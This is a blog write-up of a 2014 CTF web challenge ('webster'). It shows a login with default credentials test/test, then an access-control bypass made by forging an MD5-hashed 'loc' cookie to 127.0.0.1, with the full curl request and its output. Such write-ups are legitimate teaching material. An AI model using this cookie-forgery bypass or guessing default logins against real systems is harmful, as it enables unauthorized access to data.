This year “No cON Name Capture The Flag” quals had more than three challenges to compete for the final, so big thanks to organizers to extend last year limit. At now ( 09:27 am GMT+2 ), @DefCon-UA (dcua team) have finished all challenges and have left +12 hours for competition’s end. So it’s time to draft some web write-ups.

all finished

First “webster” 200 points web challenge, show us a login form that after multiples sqli, xpath, ldap… injections with no luck,  tried login common accounts.

Username ‘test’ and password ‘test’ was the lucky one to access main private area.

private_area

 

We have id, filename, location, username on 4 files where captain obvious says flag.txt is our target file. But not to fast, something is blocking our tries to read this file. It says:

"Seems that you are not in the right place for that"

So am i not in the right place? where could we go to get permissions on that file ? See the cookies, pay close attention in one called ‘loc’:

pantallazo_ 2014-09-14 a la(s) 10.41.31

 

 

Oh! Seems md5 for something we can’t find in our first try. But wait, maybe location means ip ? let’s try wuth the one appears on the column;

>>> ip='10.128.29.136'
>>> hashlib.md5(ip).hexdigest()
'c869d000ef5c6fdfa128b058d2865512'

Yes! It’s the same ip in hash format, so can you figure out the rest? Let’s try to replace this cookie with 127.0.0.1 (f528764d624db129b32c21fbca0cb8d6) location.

$ curl -vvv -k 'https://ctf.noconname.org/webster/content.php?op=4' -H 'Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;'
* Adding handle: conn: 0x7fe7cb804000
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x7fe7cb804000) send_pipe: 1, recv_pipe: 0
* About to connect() to ctf.noconname.org port 443 (#0)
*   Trying 88.87.208.202...
* Connected to ctf.noconname.org (88.87.208.202) port 443 (#0)
* TLS 1.0 connection using TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate: ctf.noconname.org
> GET /webster/content.php?op=4 HTTP/1.1
> User-Agent: curl/7.30.0
> Host: ctf.noconname.org
> Accept: */*
> Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;
>
< HTTP/1.1 200 OK
* Server nginx is not blacklisted
< Server: nginx
< Date: Sun, 14 Sep 2014 08:55:48 GMT
< Content-Type: text/html
< Content-Length: 38
< Connection: keep-alive
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Strict-Transport-Security: max-age=15768000

NCN_f528764d624db129b32c21fbca0cb8d6

flag: NCN_f528764d624db129b32c21fbca0cb8d6

ps: Thanks to my dcua team mates.

 



4 thoughts on “WEBster [No cON Name 2014 CTF – QUALS]

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Conoce cómo se procesan los datos de tus comentarios.